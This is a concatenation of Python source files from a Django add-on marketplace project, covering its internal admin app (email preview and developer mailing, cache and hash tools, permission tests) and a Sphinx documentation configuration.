topic = '%s-%s-%s' % (object.__class__._meta.db_table, object.pk,
suffix)
self.topic = topic
def filter(self, *args, **kw):
kw['topic'] = self.topic
return EmailPreview.objects.filter(**kw)
def send_mail(self, subject, body,
from_email=settings.DEFAULT_FROM_EMAIL,
recipient_list=tuple([])):
return EmailPreview.objects.create(
topic=self.topic,
subject=subject, body=body,
recipient_list=u','.join(recipient_list),
from_email=from_email)
class EmailPreview(amo.models.ModelBase):
"""A log of emails for previewing purposes.
This is only for development and the data might get deleted at any time.
"""
topic = models.CharField(max_length=255, db_index=True)
recipient_list = models.TextField() # comma separated list of emails
from_email = models.EmailField()
subject = models.CharField(max_length=255)
body = models.TextField()
class Meta:
db_table = 'email_preview'
class DownloadSource(models.Model):
# e.g., `mkt-search` or `mkt-detail-`.
name = models.CharField(max_length=255)
# e.g., `full` or `prefix`.
type = models.CharField(max_length=255)
description = models.TextField()
created = models.DateTimeField(auto_now_add=True)
class Meta:
db_table = 'download_sources'
def __unicode__(self):
return u'%s (%s)' % (self.name, self.type)
########NEW FILE########
__FILENAME__ = tasks
import logging
from django.conf import settings
from celeryutils import task
from amo.utils import send_mail
from zadmin.models import EmailPreviewTopic
log = logging.getLogger('z.task')
@task(rate_limit='3/s')
def admin_email(all_recipients, subject, body, preview_only=False,
from_email=settings.DEFAULT_FROM_EMAIL,
preview_topic='admin_email', **kw):
log.info('[%s@%s] admin_email about %r'
% (len(all_recipients), admin_email.rate_limit, subject))
if preview_only:
send = EmailPreviewTopic(topic=preview_topic).send_mail
else:
send = send_mail
for recipient in all_recipients:
send(subject, body, recipient_list=[recipient], from_email=from_email)
########NEW FILE########
__FILENAME__ = test_models
from nose.tools import eq_
from amo.tests import TestCase
from zadmin.models import DownloadSource
class TestDownloadSource(TestCase):
def test_add(self):
created = DownloadSource.objects.create(name='home', type='full',
description='This is obviously for the homepage')
d = DownloadSource.objects.filter(id=created.id)
eq_(d.count(), 1)
eq_(d[0].__unicode__(), 'home (full)')
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import csv
import json
from cStringIO import StringIO
from django.conf import settings
from django.core import mail, management
from django.core.cache import cache
import mock
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo
import amo.tests
from access.models import Group, GroupUser
from addons.models import Addon
from amo.urlresolvers import reverse
from amo.utils import urlparams
from files.models import File
from users.models import UserProfile
from versions.models import Version
from zadmin.forms import DevMailerForm
from zadmin.models import EmailPreviewTopic
class TestEmailPreview(amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/users']
def setUp(self):
assert self.client.login(username='[email protected]',
password='password')
addon = Addon.objects.get(pk=3615)
self.topic = EmailPreviewTopic(addon)
def test_csv(self):
self.topic.send_mail('the subject', u'Hello Ivan Krsti\u0107',
from_email='[email protected]',
recipient_list=['[email protected]'])
r = self.client.get(reverse('zadmin.email_preview_csv',
args=[self.topic.topic]))
eq_(r.status_code, 200)
rdr = csv.reader(StringIO(r.content))
eq_(rdr.next(), ['from_email', 'recipient_list', 'subject', 'body'])
eq_(rdr.next(), ['[email protected]', '[email protected]',
'the subject', 'Hello Ivan Krsti\xc4\x87'])
class TestLookup(amo.tests.TestCase):
fixtures = ['base/users']
def setUp(self):
assert self.client.login(username='[email protected]',
password='password')
self.user = UserProfile.objects.get(pk=999)
self.url = reverse('zadmin.search', args=['users', 'userprofile'])
def test_logged_out(self):
self.client.logout()
eq_(self.client.get('%s?q=admin' % self.url).status_code, 403)
def check_results(self, q, expected):
res = self.client.get(urlparams(self.url, q=q))
eq_(res.status_code, 200)
content = json.loads(res.content)
eq_(len(content), len(expected))
ids = [int(c['value']) for c in content]
emails = [u'%s' % c['label'] for c in content]
for d in expected:
id = d['value']
email = u'%s' % d['label']
assert id in ids, (
'Expected user ID "%s" not found' % id)
assert email in emails, (
'Expected username "%s" not found' % email)
def test_lookup_wrong_model(self):
self.url = reverse('zadmin.search', args=['doesnt', 'exist'])
res = self.client.get(urlparams(self.url, q=''))
eq_(res.status_code, 404)
def test_lookup_empty(self):
users = UserProfile.objects.values('id', 'email')
self.check_results('', [dict(
value=u['id'], label=u['email']) for u in users])
def test_lookup_by_id(self):
self.check_results(self.user.id, [dict(value=self.user.id,
label=self.user.email)])
def test_lookup_by_email(self):
self.check_results(self.user.email, [dict(value=self.user.id,
label=self.user.email)])
def test_lookup_by_username(self):
self.check_results(self.user.username, [dict(value=self.user.id,
label=self.user.email)])
class TestAddonSearch(amo.tests.ESTestCase):
fixtures = ['base/users', 'base/addon_3615']
def setUp(self):
self.reindex(Addon)
assert self.client.login(username='[email protected]',
password='password')
self.url = reverse('zadmin.addon-search')
@mock.patch('mkt.webapps.tasks.index_webapps')
def test_lookup_app(self, index_webapps_mock):
# Load the Webapp fixture here, as loading it in the
# TestAddonSearch.fixtures would trigger the reindex, and fail, as
# this is an AMO test.
management.call_command('loaddata', 'base/337141-steamcube')
index_webapps_mock.assert_called()
res = self.client.get(urlparams(self.url, q='steamcube'))
eq_(res.status_code, 200)
links = pq(res.content)('form + h3 + ul li a')
eq_(len(links), 0)
if any(li.text().contains('Steamcube') for li in links):
raise AssertionError('Did not expect webapp in results.')
def test_lookup_addon(self):
res = self.client.get(urlparams(self.url, q='delicious'))
# There's only one result, so it should just forward us to that page.
eq_(res.status_code, 302)
class TestAddonAdmin(amo.tests.TestCase):
fixtures = ['base/users', 'base/337141-steamcube', 'base/addon_3615']
def setUp(self):
assert self.client.login(username='[email protected]',
password='password')
self.url = reverse('admin:addons_addon_changelist')
def test_no_webapps(self):
res = self.client.get(self.url)
doc = pq(res.content)
rows = doc('#result_list tbody tr')
eq_(rows.length, 1)
eq_(rows.find('a').attr('href'),
'/en-US/admin/models/addons/addon/3615/')
class TestAddonManagement(amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/users']
def setUp(self):
self.addon = Addon.objects.get(pk=3615)
self.url = reverse('zadmin.addon_manage', args=[self.addon.slug])
self.client.login(username='[email protected]', password='password')
def _form_data(self, data=None):
initial_data = {
'status': '4',
'highest_status': '4',
'outstanding': '0',
'form-0-status': '4',
'form-0-id': '67442',
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '1',
}
if data:
initial_data.update(data)
return initial_data
def test_addon_status_change(self):
data = self._form_data({'status': '2'})
r = self.client.post(self.url, data, follow=True)
eq_(r.status_code, 200)
addon = Addon.objects.get(pk=3615)
eq_(addon.status, 2)
def test_outstanding_change(self):
data = self._form_data({'outstanding': '1'})
r = self.client.post(self.url, data, follow=True)
eq_(r.status_code, 200)
addon = Addon.objects.get(pk=3615)
eq_(addon.outstanding, 1)
def test_addon_file_status_change(self):
data = self._form_data({'form-0-status': '2'})
r = self.client.post(self.url, data, follow=True)
eq_(r.status_code, 200)
file = File.objects.get(pk=67442)
eq_(file.status, 2)
@mock.patch.object(File, 'file_path',
amo.tests.AMOPaths().file_fixture_path(
'delicious_bookmarks-2.1.106-fx.xpi'))
def test_regenerate_hash(self):
version = Version.objects.create(addon_id=3615)
file = File.objects.create(
filename='delicious_bookmarks-2.1.106-fx.xpi', version=version)
r = self.client.post(reverse('zadmin.recalc_hash', args=[file.id]))
eq_(json.loads(r.content)[u'success'], 1)
file = File.objects.get(pk=file.id)
assert file.size, 'File size should not be zero'
assert file.hash, 'File hash should not be empty'
@mock.patch.object(File, 'file_path',
amo.tests.AMOPaths().file_fixture_path(
'delicious_bookmarks-2.1.106-fx.xpi'))
def test_regenerate_hash_get(self):
""" Don't allow GET """
version = Version.objects.create(addon_id=3615)
file = File.objects.create(
filename='delicious_bookmarks-2.1.106-fx.xpi', version=version)
r = self.client.get(reverse('zadmin.recalc_hash', args=[file.id]))
eq_(r.status_code, 405) # GET out of here
class TestMemcache(amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/users']
def setUp(self):
self.url = reverse('zadmin.memcache')
cache.set('foo', 'bar')
self.client.login(username='[email protected]', password='password')
def test_login(self):
self.client.logout()
eq_(self.client.get(self.url).status_code, 302)
def test_can_clear(self):
self.client.post(self.url, {'yes': 'True'})
eq_(cache.get('foo'), None)
def test_cant_clear(self):
self.client.post(self.url, {'yes': 'False'})
eq_(cache.get('foo'), 'bar')
class TestElastic(amo.tests.ESTestCase):
fixtures = ['base/addon_3615', 'base/users']
def setUp(self):
self.url = reverse('zadmin.elastic')
self.client.login(username='[email protected]', password='password')
def test_login(self):
self.client.logout()
self.assertRedirects(self.client.get(self.url),
reverse('users.login') + '?to=/en-US/admin/elastic')
class TestEmailDevs(amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/users']
def setUp(self):
self.login('admin')
self.addon = Addon.objects.get(pk=3615)
def post(self, recipients='eula', subject='subject', message='msg',
preview_only=False):
return self.client.post(reverse('zadmin.email_devs'),
dict(recipients=recipients, subject=subject,
message=message,
preview_only=preview_only))
def test_preview(self):
res = self.post(preview_only=True)
self.assertNoFormErrors(res)
preview = EmailPreviewTopic(topic='email-devs')
eq_([e.recipient_list for e in preview.filter()], ['[email protected]'])
eq_(len(mail.outbox), 0)
def test_actual(self):
subject = 'about eulas'
message = 'message about eulas'
res = self.post(subject=subject, message=message)
self.assertNoFormErrors(res)
self.assertRedirects(res, reverse('zadmin.email_devs'))
eq_(len(mail.outbox), 1)
eq_(mail.outbox[0].subject, subject)
eq_(mail.outbox[0].body, message)
eq_(mail.outbox[0].to, ['[email protected]'])
eq_(mail.outbox[0].from_email, settings.DEFAULT_FROM_EMAIL)
def test_only_eulas(self):
self.addon.update(eula=None)
res = self.post()
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 0)
def test_only_apps_with_payments(self):
self.addon.update(type=amo.ADDON_WEBAPP,
premium_type=amo.ADDON_PREMIUM)
res = self.post(recipients='payments')
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 1)
mail.outbox = []
self.addon.update(status=amo.STATUS_PENDING)
res = self.post(recipients='payments')
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 1)
mail.outbox = []
self.addon.update(status=amo.STATUS_DELETED)
res = self.post(recipients='payments')
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 0)
def test_only_free_apps_with_new_regions(self):
self.addon.update(type=amo.ADDON_WEBAPP)
res = self.post(recipients='free_apps_region_enabled')
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 0)
mail.outbox = []
res = self.post(recipients='free_apps_region_disabled')
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 1)
mail.outbox = []
self.addon.update(enable_new_regions=True)
res = self.post(recipients='free_apps_region_enabled')
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 1)
mail.outbox = []
res = self.post(recipients='free_apps_region_disabled')
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 0)
def test_only_apps_with_payments_and_new_regions(self):
self.addon.update(type=amo.ADDON_WEBAPP,
premium_type=amo.ADDON_PREMIUM)
res = self.post(recipients='payments_region_enabled')
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 0)
mail.outbox = []
res = self.post(recipients='payments_region_disabled')
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 1)
mail.outbox = []
self.addon.update(enable_new_regions=True)
res = self.post(recipients='payments_region_enabled')
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 1)
mail.outbox = []
res = self.post(recipients='payments_region_disabled')
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 0)
def test_only_desktop_apps(self):
from addons.models import AddonDeviceType
self.addon.update(type=amo.ADDON_WEBAPP)
AddonDeviceType.objects.create(addon=self.addon,
device_type=amo.DEVICE_MOBILE.id)
res = self.post(recipients='desktop_apps')
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 0)
mail.outbox = []
AddonDeviceType.objects.create(addon=self.addon,
device_type=amo.DEVICE_DESKTOP.id)
res = self.post(recipients='desktop_apps')
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 1)
mail.outbox = []
self.addon.update(status=amo.STATUS_PENDING)
res = self.post(recipients='desktop_apps')
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 1)
mail.outbox = []
self.addon.update(status=amo.STATUS_DELETED)
res = self.post(recipients='desktop_apps')
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 0)
def test_only_apps(self):
self.addon.update(type=amo.ADDON_WEBAPP)
res = self.post(recipients='apps')
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 1)
def test_only_extensions(self):
self.addon.update(type=amo.ADDON_EXTENSION)
res = self.post(recipients='all_extensions')
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 1)
def test_ignore_deleted_always(self):
self.addon.update(status=amo.STATUS_DELETED)
for name, label in DevMailerForm._choices:
res = self.post(recipients=name)
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 0)
def test_exclude_pending_for_addons(self):
self.addon.update(status=amo.STATUS_PENDING)
for name, label in DevMailerForm._choices:
if name in ('payments', 'desktop_apps'):
continue
res = self.post(recipients=name)
self.assertNoFormErrors(res)
eq_(len(mail.outbox), 0)
class TestPerms(amo.tests.TestCase):
fixtures = ['base/users', 'base/apps']
def test_admin_user(self):
# Admin should see views with Django's perm decorator and our own.
assert self.client.login(username='[email protected]',
password='password')
eq_(self.client.get(reverse('zadmin.index')).status_code, 200)
eq_(self.client.get(reverse('zadmin.settings')).status_code, 200)
eq_(self.client.get(reverse('zadmin.addon-search')).status_code, 200)
def test_staff_user(self):
# Staff users have some privileges.
user = UserProfile.objects.get(email='[email protected]')
group = Group.objects.create(name='Staff', rules='AdminTools:View')
GroupUser.objects.create(group=group, user=user)
assert self.client.login(username='[email protected]',
password='password')
eq_(self.client.get(reverse('zadmin.index')).status_code, 200)
eq_(self.client.get(reverse('zadmin.settings')).status_code, 200)
eq_(self.client.get(reverse('zadmin.addon-search')).status_code, 200)
def test_sr_reviewers_user(self):
# Sr Reviewers users have only a few privileges.
user = UserProfile.objects.get(email='[email protected]')
group = Group.objects.create(name='Sr Reviewer',
rules='ReviewerAdminTools:View')
GroupUser.objects.create(group=group, user=user)
assert self.client.login(username='[email protected]',
password='password')
eq_(self.client.get(reverse('zadmin.index')).status_code, 200)
eq_(self.client.get(reverse('zadmin.addon-search')).status_code, 200)
eq_(self.client.get(reverse('zadmin.settings')).status_code, 403)
def test_bulk_compat_user(self):
# Bulk Compatibility Updaters only have access to /admin/validation/*.
user = UserProfile.objects.get(email='[email protected]')
group = Group.objects.create(name='Bulk Compatibility Updaters',
rules='BulkValidationAdminTools:View')
GroupUser.objects.create(group=group, user=user)
assert self.client.login(username='[email protected]',
password='password')
eq_(self.client.get(reverse('zadmin.index')).status_code, 200)
eq_(self.client.get(reverse('zadmin.addon-search')).status_code, 403)
eq_(self.client.get(reverse('zadmin.settings')).status_code, 403)
def test_unprivileged_user(self):
# Unprivileged user.
assert self.client.login(username='[email protected]',
password='password')
eq_(self.client.get(reverse('zadmin.index')).status_code, 403)
eq_(self.client.get(reverse('zadmin.settings')).status_code, 403)
eq_(self.client.get(reverse('zadmin.addon-search')).status_code, 403)
# Anonymous users should also get a 403.
self.client.logout()
self.assertRedirects(self.client.get(reverse('zadmin.index')),
reverse('users.login') + '?to=/en-US/admin/')
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from django.contrib import admin
from django.core.exceptions import PermissionDenied
from django.shortcuts import redirect
from addons.urls import ADDON_ID
from amo.urlresolvers import reverse
from . import views
urlpatterns = patterns('',
# AMO stuff.
url('^$', views.index, name='zadmin.index'),
url('^models$', lambda r: redirect('admin:index'), name='zadmin.home'),
url('^addon/manage/%s/$' % ADDON_ID,
views.addon_manage, name='zadmin.addon_manage'),
url('^addon/recalc-hash/(?P<file_id>\d+)/', views.recalc_hash,
name='zadmin.recalc_hash'),
url('^env$', views.env, name='amo.env'),
url('^hera', views.hera, name='zadmin.hera'),
url('^memcache$', views.memcache, name='zadmin.memcache'),
url('^settings', views.show_settings, name='zadmin.settings'),
url('^fix-disabled', views.fix_disabled_file, name='zadmin.fix-disabled'),
url(r'^email_preview/(?P<topic>.*)\.csv$',
views.email_preview_csv, name='zadmin.email_preview_csv'),
url('^mail$', views.mail, name='zadmin.mail'),
url('^email-devs$', views.email_devs, name='zadmin.email_devs'),
url('^generate-error$', views.generate_error,
name='zadmin.generate-error'),
url('^export_email_addresses$', views.export_email_addresses,
name='zadmin.export_email_addresses'),
url('^email_addresses_file$', views.email_addresses_file,
name='zadmin.email_addresses_file'),
url('^price-tiers$', views.price_tiers, name='zadmin.price_tiers'),
# The Django admin.
url('^models/', include(admin.site.urls)),
url('^models/(?P<app_id>.+)/(?P<model_id>.+)/search.json$',
views.general_search, name='zadmin.search'),
)
# Hijack the admin's login to use our pages.
def login(request):
# If someone is already auth'd then they're getting directed to login()
# because they don't have sufficient permissions.
if request.user.is_authenticated():
raise PermissionDenied
else:
return redirect('%s?to=%s' % (reverse('users.login'), request.path))
admin.site.login = login
########NEW FILE########
__FILENAME__ = views
import csv
from urlparse import urlparse
from django import http
from django.conf import settings
from django.contrib import admin
from django.core.cache import cache
from django.core.exceptions import PermissionDenied
from django.core.files.storage import default_storage as storage
from django.db.models.loading import cache as app_cache
from django.shortcuts import get_object_or_404, redirect, render
from django.views import debug
from django.views.decorators.cache import never_cache
import commonware.log
import jinja2
from hera.contrib.django_forms import FlushForm
from hera.contrib.django_utils import flush_urls, get_hera
import amo
from addons.decorators import addon_view
from addons.models import AddonUser
from amo import messages
from amo.decorators import any_permission_required, json_view, post_required
from amo.mail import FakeEmailBackend
from amo.urlresolvers import reverse
from amo.utils import chunked
from devhub.models import ActivityLog
from files.models import File
from users.models import UserProfile
from zadmin.forms import GenerateErrorForm, PriceTiersForm
from . import tasks
from .decorators import admin_required
from .forms import AddonStatusForm, DevMailerForm, FileFormSet, YesImSure
from .models import EmailPreviewTopic
from mkt.prices.utils import update_from_csv
log = commonware.log.getLogger('z.zadmin')
@admin.site.admin_view
def hera(request):
form = FlushForm(initial={'flushprefix': settings.SITE_URL})
boxes = []
configured = False # Default to not showing the form.
for i in settings.HERA:
hera = get_hera(i)
r = {'location': urlparse(i['LOCATION'])[1], 'stats': False}
if hera:
r['stats'] = hera.getGlobalCacheInfo()
configured = True
boxes.append(r)
if not configured:
messages.error(request, "Hera is not (or mis-)configured.")
form = None
if request.method == 'POST' and hera:
form = FlushForm(request.POST)
if form.is_valid():
expressions = request.POST['flushlist'].splitlines()
for url in expressions:
num = flush_urls([url], request.POST['flushprefix'], True)
msg = ("Flushed %d objects from front end cache for: %s"
% (len(num), url))
log.info("[Hera] (user:%s) %s" % (request.user, msg))
messages.success(request, msg)
return render(request, 'zadmin/hera.html', {'form': form, 'boxes': boxes})
@admin_required
def show_settings(request):
settings_dict = debug.get_safe_settings()
# sigh
settings_dict['HERA'] = []
for i in settings.HERA:
settings_dict['HERA'].append(debug.cleanse_setting('HERA', i))
for i in ['GOOGLE_ANALYTICS_CREDENTIALS',]:
settings_dict[i] = debug.cleanse_setting(i,
getattr(settings, i, {}))
settings_dict['WEBAPPS_RECEIPT_KEY'] = '********************'
return render(request, 'zadmin/settings.html',
{'settings_dict': settings_dict})
@admin_required
def env(request):
return http.HttpResponse(u'<pre>%s</pre>' % (jinja2.escape(request)))
@admin.site.admin_view
def fix_disabled_file(request):
file_ = None
if request.method == 'POST' and 'file' in request.POST:
file_ = get_object_or_404(File, id=request.POST['file'])
if 'confirm' in request.POST:
file_.unhide_disabled_file()
messages.success(request, 'We have done a great thing.')
return redirect('zadmin.fix-disabled')
return render(request, 'zadmin/fix-disabled.html',
{'file': file_, 'file_id': request.POST.get('file', '')})
@any_permission_required([('Admin', '%'),
('BulkValidationAdminTools', 'View')])
def email_preview_csv(request, topic):
resp = http.HttpResponse()
resp['Content-Type'] = 'text/csv; charset=utf-8'
resp['Content-Disposition'] = "attachment; filename=%s.csv" % (topic)
writer = csv.writer(resp)
fields = ['from_email', 'recipient_list', 'subject', 'body']
writer.writerow(fields)
rs = EmailPreviewTopic(topic=topic).filter().values_list(*fields)
for row in rs:
writer.writerow([r.encode('utf8') for r in row])
return resp
@admin.site.admin_view
def mail(request):
backend = FakeEmailBackend()
if request.method == 'POST':
backend.clear()
return redirect('zadmin.mail')
return render(request, 'zadmin/mail.html', dict(mail=backend.view_all()))
@admin.site.admin_view
def email_devs(request):
form = DevMailerForm(request.POST or None)
preview = EmailPreviewTopic(topic='email-devs')
if preview.filter().count():
preview_csv = reverse('zadmin.email_preview_csv',
args=[preview.topic])
else:
preview_csv = None
if request.method == 'POST' and form.is_valid():
data = form.cleaned_data
qs = (AddonUser.objects.filter(role__in=(amo.AUTHOR_ROLE_DEV,
amo.AUTHOR_ROLE_OWNER))
.exclude(user__email=None))
if data['recipients'] in ('payments', 'desktop_apps'):
qs = qs.exclude(addon__status=amo.STATUS_DELETED)
else:
qs = qs.filter(addon__status__in=amo.LISTED_STATUSES)
if data['recipients'] == 'eula':
qs = qs.exclude(addon__eula=None)
elif data['recipients'] in ('payments',
'payments_region_enabled',
'payments_region_disabled'):
qs = qs.filter(addon__type=amo.ADDON_WEBAPP)
qs = qs.exclude(addon__premium_type__in=(amo.ADDON_FREE,
amo.ADDON_OTHER_INAPP))
if data['recipients'] == 'payments_region_enabled':
qs = qs.filter(addon__enable_new_regions=True)
elif data['recipients'] == 'payments_region_disabled':
qs = qs.filter(addon__enable_new_regions=False)
elif data['recipients'] in ('apps', 'free_apps_region_enabled',
'free_apps_region_disabled'):
qs = qs.filter(addon__type=amo.ADDON_WEBAPP)
if data['recipients'] == 'free_apps_region_enabled':
qs = qs.filter(addon__enable_new_regions=True)
elif data['recipients'] == 'free_apps_region_disabled':
qs = qs.filter(addon__enable_new_regions=False)
elif data['recipients'] == 'desktop_apps':
qs = (qs.filter(addon__type=amo.ADDON_WEBAPP,
addon__addondevicetype__device_type=amo.DEVICE_DESKTOP.id))
elif data['recipients'] == 'all_extensions':
qs = qs.filter(addon__type=amo.ADDON_EXTENSION)
else:
raise NotImplementedError('If you want to support emailing other '
'types of developers, do it here!')
if data['preview_only']:
# Clear out the last batch of previewed emails.
preview.filter().delete()
total = 0
for emails in chunked(set(qs.values_list('user__email', flat=True)),
100):
total += len(emails)
tasks.admin_email.delay(emails, data['subject'], data['message'],
preview_only=data['preview_only'],
preview_topic=preview.topic)
msg = 'Emails queued for delivery: %s' % total
if data['preview_only']:
msg = '%s (for preview only, emails not sent!)' % msg
messages.success(request, msg)
return redirect('zadmin.email_devs')
return render(request, 'zadmin/email-devs.html',
dict(form=form, preview_csv=preview_csv))
@any_permission_required([('Admin', '%'),
('AdminTools', 'View'),
('ReviewerAdminTools', 'View'),
('BulkValidationAdminTools', 'View')])
def index(request):
log = ActivityLog.objects.admin_events()[:5]
return render(request, 'zadmin/index.html', {'log': log})
@never_cache
@json_view
def general_search(request, app_id, model_id):
if not admin.site.has_permission(request):
raise PermissionDenied
model = app_cache.get_model(app_id, model_id)
if not model:
raise http.Http404
limit = 10
obj = admin.site._registry[model]
ChangeList = obj.get_changelist(request)
# This is a hideous api, but uses the builtin admin search_fields API.
# Expecting this to get replaced by ES so soon, that I'm not going to lose
# too much sleep about it.
cl = ChangeList(request, obj.model, [], [], [], [], obj.search_fields, [],
obj.list_max_show_all, limit, [], obj)
qs = cl.get_query_set(request)
# Override search_fields_response on the ModelAdmin object
# if you'd like to pass something else back to the front end.
lookup = getattr(obj, 'search_fields_response', None)
return [{'value': o.pk, 'label': getattr(o, lookup) if lookup else str(o)}
for o in qs[:limit]]
@admin_required(reviewers=True)
@addon_view
def addon_manage(request, addon):
form = AddonStatusForm(request.POST or None, instance=addon)
pager = amo.utils.paginate(request, addon.versions.all(), 30)
# A list coercion so this doesn't result in a subquery with a LIMIT which
# MySQL doesn't support (at this time).
versions = list(pager.object_list)
files = File.objects.filter(version__in=versions).select_related('version')
formset = FileFormSet(request.POST or None, queryset=files)
if form.is_valid() and formset.is_valid():
if 'status' in form.changed_data:
amo.log(amo.LOG.CHANGE_STATUS, addon, form.cleaned_data['status'])
log.info('Addon "%s" status changed to: %s' % (
addon.slug, form.cleaned_data['status']))
form.save()
if 'highest_status' in form.changed_data:
log.info('Addon "%s" highest status changed to: %s' % (
addon.slug, form.cleaned_data['highest_status']))
form.save()
if 'outstanding' in form.changed_data:
log.info('Addon "%s" changed to%s outstanding' % (addon.slug,
'' if form.cleaned_data['outstanding'] else ' not'))
form.save()
for form in formset:
if 'status' in form.changed_data:
log.info('Addon "%s" file (ID:%d) status changed to: %s' % (
addon.slug, form.instance.id, form.cleaned_data['status']))
form.save()
return redirect('zadmin.addon_manage', addon.slug)
# Build a map from file.id to form in formset for precise form display
form_map = dict((form.instance.id, form) for form in formset.forms)
# A version to file map to avoid an extra query in the template
file_map = {}
for file in files:
file_map.setdefault(file.version_id, []).append(file)
return render(request, 'zadmin/addon_manage.html', {
'addon': addon, 'pager': pager, 'versions': versions, 'form': form,
'formset': formset, 'form_map': form_map, 'file_map': file_map})
@admin.site.admin_view
@post_required
@json_view
def recalc_hash(request, file_id):
file = get_object_or_404(File, pk=file_id)
file.size = storage.size(file.file_path)
file.hash = file.generate_hash()
file.save()
log.info('Recalculated hash for file ID %d' % file.id)
messages.success(request,
'File hash and size recalculated for file %d.' % file.id)
return {'success': 1}
@admin.site.admin_view
def memcache(request):
form = YesImSure(request.POST or None)
if form.is_valid() and form.cleaned_data['yes']:
cache.clear()
form = YesImSure()
messages.success(request, 'Cache cleared')
if cache._cache and hasattr(cache._cache, 'get_stats'):
stats = cache._cache.get_stats()
else:
stats = []
return render(request, 'zadmin/memcache.html',
{'form': form, 'stats': stats})
@admin_required
def generate_error(request):
form = GenerateErrorForm(request.POST or None)
if request.method == 'POST' and form.is_valid():
form.explode()
return render(request, 'zadmin/generate-error.html', {'form': form})
@any_permission_required([('Admin', '%'),
('MailingLists', 'View')])
def export_email_addresses(request):
return render(request, 'zadmin/export_button.html', {})
@any_permission_required([('Admin', '%'),
('MailingLists', 'View')])
def email_addresses_file(request):
resp = http.HttpResponse()
resp['Content-Type'] = 'text/plain; charset=utf-8'
resp['Content-Disposition'] = ('attachment; '
'filename=amo_optin_emails.txt')
emails = (UserProfile.objects.filter(notifications__notification_id=13,
notifications__enabled=1)
.values_list('email', flat=True))
for e in emails:
if e is not None:
resp.write(e + '\n')
return resp
@admin_required
def price_tiers(request):
output = []
form = PriceTiersForm(request.POST or None, request.FILES)
if request.method == 'POST' and form.is_valid():
output = update_from_csv(form.cleaned_data['prices'])
return render(request, 'zadmin/update-prices.html',
{'result': output, 'form': form})
########NEW FILE########
__FILENAME__ = settings
from lib.settings_base import *
ROOT_URLCONF = 'default.urls'
########NEW FILE########
__FILENAME__ = urls
from lib.urls_base import *
########NEW FILE########
__FILENAME__ = conf
import sys
import os
sys.path.append(os.path.abspath('../..'))
from docs.conf import * # noqa
project = u'API v1'
version = release = '1.0' # Should correspond to the API version number
intersphinx_mapping = {}
########NEW FILE########
__FILENAME__ = conf
# -*- coding: utf-8 -*-
#
# zamboni documentation build configuration file, created by
# sphinx-quickstart on Thu Oct 22 20:39:35 2009.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.abspath('.'))
sys.path.append(os.path.abspath('..'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest',
'sphinx.ext.intersphinx', 'sphinx.ext.todo',
'sphinx.ext.coverage', 'extensions.src_role',
'sphinxcontrib.httpdomain']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'zamboni'
copyright = u'2013, The Marketplace API Crew'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.8'
# The full version, including alpha/beta/rc tags.
release = '0.8'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
#html_theme_path = ['_themes']
#html_theme = 'mozilla'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
